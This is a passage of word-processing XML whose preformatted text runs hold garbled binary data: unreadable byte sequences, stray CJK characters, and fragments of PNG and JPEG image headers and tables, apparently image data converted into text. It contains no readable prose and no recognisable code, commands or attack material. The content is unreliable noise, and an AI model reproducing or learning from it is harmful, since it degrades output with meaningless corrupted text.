    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#P&amp;?k?$????~#?##?#?e??</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>萟</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>YULm?</w:t>
        <w:br/>
        <w:t>?7?+????#?##-?eK#?</w:t>
        <w:tab/>
        <w:t>???H?b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 $??#?O?8#?#|S D?W</w:t>
        <w:tab/>
        <w:t>F5?$??!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(??##WsD?4?!FXt?V?2#???#\??&gt;??'9G???#?Ds?+#?Ju?@??#?4??Z??#S6?#?ig?c'?C??#Z??E`W?&lt;#?f?o?#/j?O??#{f?&amp;??-?#R??Y?#?????##)oy?? ?D?</w:t>
        <w:tab/>
        <w:t>EY?0????Oa??~??????n$??6E?9??#?PG???(???##U?#?#?/?p??u??###??`?##?/{??#?#???#????????&gt;?#?L????~iM2#??Pz??r??#Z???&amp;???]?B?#?/??+e??d??#??c#??#???&gt;?&lt;?#]#?G???6?-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RE????e#??&amp;??#??#~??#}?.oPK#;{#Pn7?,?O?=]??l?#p?#L?q#6????o?#c?=???c?0?&lt;?6UN???#7TH.VWSq?`&gt;?##7??l(?,???#-??#?[?H?#??g????#S?????Z6??Us??m#?te???#???</w:t>
        <w:br/>
        <w:t>#?)?D??V.gX#\?#???#4_?#3?sm??4#?a?#j?#R\^??|v?#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#u#?=~`?a?3?????###?#??ī??&gt;?#?vI??%????z??#?`?????8?!??#+???Ш?3#*Z^</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?$#?????b1??y?&lt;?#??^o/rL5z#j??#???B</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>????dk#?!??!??P??</w:t>
        <w:tab/>
        <w:t>??&gt;#???u]???X\J?6Aj?Z??@z???</w:t>
        <w:br/>
        <w:t>+##7:##:6X;vWPx;?Z?g44?b?dl?#??#?#?t??1#?#r?#?1.??=#?%Q?Qh?t#y??!&gt;5?c?*?#t???#J???e-Y?g???/#V??_?|???K??.#?W??jv</w:t>
        <w:tab/>
        <w:t>[*?8\$c????##!G?M0^?KQV#9$]??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3e?!?#b?\5Q]8V?u=#???["????t###?5?t&amp;i??n???m#????&amp;?.N2?|9T_#?|E???sC?##?/6??#q#??#*?&gt;???@d??k#?1????qH#?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=Z6{?I3?????##v?.T??.##??]??</w:t>
        <w:br/>
        <w:t>?#??#??d?#*-=?&gt;.-??pU#?&amp;?KG?#????d?8E?#u)???4k=??q#???8??~L?????#?X)?K???.?wX?=??j$=jN???#s???nD5??</w:t>
        <w:tab/>
        <w:t>?g?#?}?u????#??#???#??[#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?P#??m??7?Q?,?+?o1w??+SS#??#%?2S??L???5v#3P?###N;??Qz#???^?~!?I???&gt;#?#!?R?N#??#O?#???RX??(=???#?m?{???#???f??-$??F???%?Й#?V!Gi??,b?I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O??#??#???b??%8???^%]s??(??d?0'K?[i???#??#?s??|N ?&lt;h?#???P?*g?V?t?X)O#?1??b?&gt;^??#???i???#???s?#?#/?8?$?#r?GXc????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q?bAly&gt;?L??#Y?#?FK?)#??f??##???D?a?????5??##S?E?U#f;_?+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j?%Iv?#??????=</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>樛</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Bo?#?E??R??#U??l8?y#?#????s8?jLS0?#??vD??</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>-l#?1?B????y?;###??Js???,?x?~f?d???w(#?#[6???#?#?S??W?^q????????|##?#?#a#??3?p???#?#?N -?????U#9##[?&lt;#y???D#|??#w%??#?e?#?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?$??#~????M?c##?Q#??#?*h'?~?-B??L-??d?+sK?#??J???D??Y?z?.~?a?m7#?^??8??/_]?e?q#???Sl*?U?#??*?`#??#?NQ??+V???#H&amp;]d3p</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>睋</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>-?9#?6p?w?#l???G#?#?L?#??cH</w:t>
        <w:tab/>
        <w:t>|X#?o??Sld??###?S{?#&lt;??C{?t.?jZ#??g?AbeWZ#n???.?#p?%#?L$_#?@N?6?6S3??V#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Z??$?J??w?z????j??e???=???}N#?lR?#???????{)#*??R#???U? ?</w:t>
        <w:tab/>
        <w:t>L?Ur?#?E#??&gt;??? ?e??p?"{?#??#?#|#H?|??0u?0_d~????4-??Y:??cl?Y?l??U?????P#%W??@?B#-??z3?##??? ??#?H#?L#FT?i?N??#N??#??#?Y??E???#?d_#sm#?(?S?;?P??Ae?~??</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>咭</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>?T?#T?#?#n??gt?+#?#?M??o??6:?i?l????C?f6Q?i??[?d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?AE#?f?#^u??#9fp,?]?###?#?fl!?hF???#?4?$??k??cdm??d???:?c??1S??B?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>s#??G???Ia?"???S??^??</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>巗</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>??Z? %L6{????tg?#?yB??{???w]C#9?X?Y?&amp;??!O#:??##?j??X?|??#N=??#??M(&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>D?*:#+??q???#f?9y`???</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#o???+?Jj???+????? pA#X???=b??S##?~??r?L?\#??#?w??4#XQ.??#?#??bM?#,??#z#?????</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#??G:D#</w:t>
        <w:br/>
        <w:t>?pc?G?/tJ?2?L?#?#E&gt;~??</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>釵</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>??y??:???,?Et??7?##??#?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h'##??2e;????a{?'?|)?g???c$,??</w:t>
        <w:tab/>
        <w:t>9?s9@#55M? ??# 3?$)??2??pb?#d#?E2s????\K#N&gt;?}? ?-????~??#?#?u67###Z??/#???f??&amp;4#??Q?`l?).??q?#Zs#</w:t>
        <w:br/>
        <w:t>???r??#??lf#??)?hllo2?1:????J???)??L?g$C}#??.&gt;?}?Y??##?$#0???\?c???X??#?18??#?p??f*#~8?o??eVd9???VJ=??#??v?e7##</w:t>
        <w:tab/>
        <w:t>#?z?#1#utEi?&amp;?BO?ZY#??#?O</w:t>
        <w:br/>
        <w:t>????m??a~?t%l+Y|?,????#&gt;+C&gt;d??wpn?+#?eF"z?9q?#?#?#Of&gt;me#??l?HI???l?x%?to??MM??ZJ:!gB#?#n#??v????5??</w:t>
        <w:br/>
        <w:t>?LM???PT?Ls?6??##?DC#r?&lt;???#???X?%?##G?S5e3(-&amp;{9?###?#C#??G??2?7??"??RN]Bt??=#??~n? ;R.?h???Yfpz???Et???Н????Va#?#!?c??#w6#h?##?,x??#a,??????:oY{????N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"??H?*??^#??#+}Z~?I??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j0S4?.?X`??</w:t>
        <w:br/>
        <w:t>_?#?$f2v9???&gt;??#n?,p??"~2?S?!#?#?l?????2?#?????F?###*?5.:X?#??E?V??o?#?0CK?#IL?B?_,?h6?????#OIXA#?}&gt;i?h#?#??!??MI;B?_)8??#S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n?X87?</w:t>
        <w:br/>
        <w:t>h?z???4????Dd??o}?#?????c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o1????Z??sc????V??,sD?6?#?&gt;?&gt;?#?#?@"r6??N?#?+3????l#??O$?</w:t>
        <w:tab/>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?,&lt;?b%?????V??#?h?%i?F?##</w:t>
        <w:br/>
        <w:t>??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f#??a?(=??d#?"?????G#?d?1?hi{ō?y?#?4?O|:???W#?g_.??#Y?O???#7X}????;??X?()~N???#x3?1?$?z?p???}#?????kX?~?=?X9?wt#?},???}??b?#M#h%u/L?w#8?B?????</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#:h??J?O?`T?E##I??\-?4????)?@u?XG#???#?hW??ae??~n\??Q?# ??:?#?#???+##Y?}N??}N???###CA:???C?b??y V#?-3?w?qa#)?^?vh?UsZ?????(??e]?L#~??b2s#Un????#-+%#?JS??3?#?????</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>???7??j?U??n#??W??@?#</w:t>
        <w:br/>
        <w:t>d1??+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#*????q2?T?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>P?s???h??e#o&gt;??"d`?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?$C??9ms%a?f???v[?CF??g????x??]?#Ls"~r#W?}?EV??#)????#??n??#X|G?????#s?? ??##?(RR??k#q:?G??]#f?V#`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>IU23?????Jv&lt;?3u?#f???/???#,??#&gt;"qF?.H ??#e???8??#?V?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?.8*&amp;m3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0?#?#4&amp;?s##b?tG?%$?x?6|#???#???a&lt;W`??7??X?#U(???8bn}N=???p???vj</w:t>
        <w:br/>
        <w:t>)g??~?7#K????bi?8?d?#h_?lM? w?^?b?#.?????T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8##?Y?C}U??N#???TZ\}Ei???z?z?dlh??EvO?????#0G?f3[[##??????##V?#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???E?X?#</w:t>
        <w:tab/>
        <w:t>?}&amp;_?</w:t>
        <w:br/>
        <w:t>=_}???W?&lt;??W_??S@Og9?????$F?#?γ/??#???d?%E????^?.???[q$??L??p/??7}</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>軗</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>[x??9?$X??A??#[?#p?e##?Xq??p??#??j????[?n??#xT9N ?&lt;r%#??</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>N3?##ū?#?N???F#?r?]???#??&lt;R#?^]?#?Om?????__???&gt;?}]!g&amp;?I?_??nzr?#?d???~?????R?#-?39?n?D?Yw???M</w:t>
        <w:br/>
        <w:t>FF??????77?~??????????o?~?÷7r#????1?&gt;?#?.#???V#j#r??#[???'</w:t>
        <w:br/>
        <w:t>??q?N4?H??T?0Iy??(?7?3#?#E?,##J??F??##w?V??#??#?????=CRZV????c+??3P??##?i?L?Ppy?2?a??d??`?Dh????T.?7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>???A#?+?#?</w:t>
        <w:br/>
        <w:t>??s?g?B#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??&lt;??????9]???????I##?bzu???zT}?#???g???O#U????????7?r?.?s}??o#?????????????#[%?}???????#D??s</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>呸</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>#??Y#??e?!?p#K#?#????#D?????g?65?W?H??:#</w:t>
        <w:br/>
        <w:t>KuL?#p&lt;g#?:8)f#&lt;?M#/. ??</w:t>
        <w:tab/>
        <w:t>?'2??W?K??5r?vC#?px:kZ??7?2??#O?#??'??????#?#&amp;??D&gt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#5#???:?#?##?p#?#&gt;bN????`{V4]?Z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?????W????#?7?#??W??ù??I??'???:??G???W}#{??q?zB???/??????7?#~?Z#3?O??~??##9?H?`?#^??u??$?T?#[#2\?_"#?##?9V?#V??)?I?T??56???,e#?#[?nw4N&amp;yJ?&gt;?I#?# :?S#?X?T???CB#?#@??xh?#??#l?lM??#??!?#0?$??X??6#+????????/???#l?A?#7dx~b??K^?}?</w:t>
        <w:br/>
        <w:t>????;?#??%?</w:t>
        <w:tab/>
        <w:t>f~'\5.?##???s?????????~?????##?xKS3?YT2z???p?;???O?o??AQ?2eyR?f?d#?7#Nm?YQ?l??U?2!?|?M??`#?p#????6???###?d??U?"???z</w:t>
        <w:tab/>
        <w:t>#??KT?s ?Q?MQ?#'</w:t>
        <w:br/>
        <w:t>?##?zs???N/??w??h?GjZ?A??7C??&gt;?y*#????##???B\#MT?2??J????????o#?W-g#???M?#C?B?##5???#aj]?????z???#??/##xJm$?l[?mjs??D]??t???c#K\l-</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>鱍</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>=h]hv#???##?</w:t>
        <w:br/>
        <w:t>?#I#???4?#0?Tlu[?????o_?h?R?????5#R?WZ?#Y?s?_#_rI??W?u??&amp;???#&amp;??#??&amp;??? }s?ri???Xu?[###?J???D9??#?#c#,?#ojy?#?#??h9??-s?N?O0?lb*?##??#jR%b???R?}R;????~???E#J*?X?j??:?#??,L???#g???#?&gt;L??2#k#????u?j????W?V??#Z[??</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>佔</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>#????&lt;n??#?tk ?#[#O?#F?'?J??#?L#R??HY???#3Q5T???v???_?u?xw+&amp;????N???? W???/?</w:t>
        <w:tab/>
        <w:t>??#O?_?X??^[{?#?^?V#??S?1??G?9p??t??}??)??&gt;QmU?[&lt;?|???+S??K??#?U??9</w:t>
        <w:tab/>
        <w:t>?)?S??#???????#????H???}#?)????k?[???</w:t>
        <w:br/>
        <w:t>?mi&lt;??e??#?i?#K#-?5??iJ??'SpC&lt;J#U#?#7?#=#?K?&gt;\}w'?w??~T2ka??.?}S?A??Mk??s</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?R&lt;a0?&lt;??N:w?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>駬</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>?2!r#?Y???'#?{?##??</w:t>
        <w:br/>
        <w:t>i##k???\#[)?$???H`EXd6#d).??{!a#??k[</w:t>
        <w:br/>
        <w:t>?S???</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?072s&gt;????#?#?i?#G"@1##?)_w#???d$???????3?#???#?#?3{#?;Y#x??#T+,4?O#w#_??XG?#?&amp;qh?BK?6?*?c#*W9?T????"?&gt;?L&amp;??#m7#?@??#???n?!T~:7faD?i@kLs??8? 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</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??#??#7&lt;?#U?f%?=??e?g?@R#??zj?_?I]????6!4?????[3B##?#r##U?#T6J#rz?q?y??Y\1????</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?F?V}@K-SfL?5?=?o#?#"?DZ?;#?????N??2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?u#?V~#?jE4#???tX??|B?u?)???^#;?????#$?1L]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??ag{?v#?O???k? h??q?]Ti*#4X&gt;I???#P!???$?n &amp;s#g?l?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?b#I#?8#?G??W\#&lt;?C???p?&gt;??8?3*l?GtU&amp;?U#?8[Fi?$????tD#?:???O&amp;G?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??d#;h??+??@,#?a#??`??#?)??d??2b?I?#???7?p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??`e?Y6'?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*?-;?U&lt;D+?K??L??hTk?r?P#2?L441?n#1@#b</w:t>
        <w:br/>
        <w:t>g###?p??=??yUS##?1`R???h???#?J?#)26??#??l?d#?##?M(?#v??#JK?g?&amp;?8{?tj??#?S?=??8??rZk:?????f???f?A#?O82?a@#?c???9??E?#?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4?#|?#kJ#?v????`?aq??????%l?I'??#JV???##??##~w??4??b?F?Cv?#g6???i?8?#`??????????z[{?????? #V???#m?S^~#?# </w:t>
        <w:br/>
        <w:t>?#ctX:?f?9g2???????##?l?t#?#*U?????#sWp??#????ae%B????#?#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?Yj's[??V#,J?e#F?κ???Mu??:?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>u???P\?QS??r#`j#?????0??`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|?K#???????#H???x#????l#??D{?#i#</w:t>
        <w:br/>
        <w:t>??5?'??q??&amp;g?3WnI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?i4d???O??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j6&gt;OeK???0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?&gt; z?s#2#f?#?|8????!#??#|L????1?##?{??3?N?0??z?VK?-e????Q?-;`?_?S;?t?vK??F???##fR?g???i?L`?a????????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e??? ?#???#?$?x?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#k??#g??Jv#U??!???[j?gx#?##R#èi?#&amp;??}~?#I??\3??jQ'?J1]??O?BE?T????vH???#?#=????v??5Fo?U0##???lj#prP?#k???$??u????4#_#+:??:??^??,a??μ??#v??#&gt;??##??&lt;?}#??@l?b#?R#?&gt;???&gt;r??3??#??W??}?`?_t?`o#6{??e????p#?i???b??*?y??'?c?d???=?6??#[??5##g?d?6</w:t>
        <w:br/>
        <w:t>?E#?ǔ??El?#?##??? [#i`#?ɡ???N???q??*?Y??c?z.??#??x?A??#?#G=?'C#?F??8!?r?psp</w:t>
        <w:br/>
        <w:t>?D?F??C?#?#?6#?Y2?oj?R?0?2$?&lt;??.??#@??9??#??#`?W.?j????#??v??`A?;?????N</w:t>
        <w:br/>
        <w:t>??*-?i(?$?n;#?7:??0??)?b@L?#=??m#9#? #?f??q92?y~??#??]??*????#?WBt?#?2?Be?b?#????m#??W??`'?{?fR#v?#?aT?1??#?AM#ZC?У?~?47SH?sO???G???h#?##?U2??#??Y?-sl?O6???????a?CB#??f??F@?@MM##?.Q?=?*?q!??</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>'EL'???@[0??=\???|?[???4Zg##-?&lt;,#?#W ?!?(#Q?X&lt;,?C#R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%??#???*{I,|????-???^#!??#????</w:t>
        <w:tab/>
        <w:t>?#?fз?T+2?O#???Y</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?=??:##BL?:?`??3?j@z???:?#d???_????ж??UT?Sō#5?!??}???@i??????$VwZE#a0##??e1?Az1?i??p??E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H?[w#?P??n[#4##??9I??#????j??y}&lt;?'? ach?D?tI]TI????#?'?#^?/&lt;??#??3??U#`L?,?3??uKV???N?G?CA?p#x???!0??##?4p?s????w???|?f???&lt;?i?\??????#??-?b2? i? ??#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E?\?#I7#5F?)#@</w:t>
        <w:br/>
        <w:t>??#6??#Q?(\???)??#??##d?#?Y#?#h??#??nZ???#??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`;#?'x?!?#7#?"C[?????d??jj##&amp;|??Y???0?B?p?"</w:t>
        <w:br/>
        <w:t>?]??#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,?2?D??n??6J??u??R??M?&gt;???]???????####IEND?B`??F#?`###</w:t>
        <w:br/>
        <w:t>#?0"????b7Z?&gt;?l?????##JFIF#####^#^##??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?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??######?##"#######??############################</w:t>
        <w:tab/>
        <w:br/>
        <w:t>#??#?################}########!1A##Qa#"q#2???##B??#R??$3br?</w:t>
        <w:tab/>
        <w:br/>
        <w:t>#####%&amp;'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz???????????????????????????????????????????????????????????????????????????############################</w:t>
        <w:tab/>
        <w:br/>
        <w:t>#??#?################w#######!1##AQ#aq#"2?##B????</w:t>
        <w:tab/>
        <w:t>#3R?#br?</w:t>
        <w:br/>
        <w:t>#$4?%?####&amp;'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?????????????????????????????????????????????????????????????????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#????#?#?^??#G5r??|R?#?????#??#??^??(??@#QE##QE##QE##QE##QE##QE##QE##QE##QE##QE#u##????????9????????#?#?^??#G5r??+??#~?^-??????</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#K?</w:t>
        <w:br/>
        <w:t>?Mt??</w:t>
        <w:tab/>
        <w:t>??#?Q?h ?#?</w:t>
        <w:br/>
        <w:t>?M??c#???#??:h?e%???+??t?'0?O#MJ#Y?F???g??#?</w:t>
        <w:tab/>
        <w:t>???$</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??^?#r?;-?,??#???#??_</w:t>
        <w:br/>
        <w:t>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??C?#kz??!i?m?&gt;&lt;??;}z*?t?|G?#??J??&amp;??K???1_4??jn???#????#n??$?#?#i#?#x?????W??#d???@?&lt;%??#?]?0????x??</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>????Q)??T???????.e#??;????4??S??E??|i?#?)?#si??9?q5??2?#??????????#?O??_#x?x???#?#?Y??#G?#????5=:q#?#ü$R?????=?Ey?^$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?#7?#??#?7???_?~?2?~n|D?Y?#????k??#\#?=?2</w:t>
        <w:tab/>
        <w:t>"?)#???#####?k????m??????#??#t#?+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YW?#??#"?'##QEu###Q@##Q@##Q@##Q@##Q@#G?/?)?-?#?????j?????#%7??#??#??\?0</w:t>
        <w:br/>
        <w:t>?Y?"#?5?_?[O?#??M_??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AJ????1?;p?#=#?3?=b'?##ě?u?[???Y????</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>搚</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>f???E#Ha?W?~2????#??\?##hN?v?)u$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x???P???)?v?a????;T??#Uq?#????]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??? b##?#{?3?????VkL?M?O???#7_</w:t>
        <w:br/>
        <w:t>F?X#p?s???#Y?]?????H?"x?K?#\@% )RF???fv?S#??!?R???^?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?F#?D#?*F?=???q?Y??#?%#?V3?W#?:?????#&gt;#??????|?_L??#{?G???#?#????/?#v?????##?#Q^??QE##QE##QE##QE##QE##?|R?#?????#??#??^???_?S|[?#a{??#???#???$????g?#?#?*+?W?A??/#??F??#?</w:t>
        <w:tab/>
        <w:t>_9??##&gt;?v#?gi?\#??5'#?#?#?K?M`|}??8#??#?~?????#8??~??i?J6?#??3l?u?#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M1</w:t>
        <w:br/>
        <w:t>&lt;?4f???W?#Q?#?</w:t>
        <w:br/>
        <w:t>|?7????50???????J3\??</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#??7??#O??L#?Id?jq?g??_?c]?u=Ov???|??e??????????+???Dm_#?{???_1??e?#????l?k?##?#Q^??#QE##QE##QE##QE##QE#u##????????9????????#?#?^??#G5r??+?W?W#</w:t>
        <w:tab/>
        <w:t>|#??-???J???????#</w:t>
        <w:br/>
        <w:t>&lt;#???e?#??_9?#&gt;?v#?gL???????1_????^O?_#'??????a&amp;?#Y)##g??-j????#?c#?#L??8????##^???3?G?##??9??&lt;??o?</w:t>
        <w:tab/>
        <w:t>??#g?#?MrO?#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
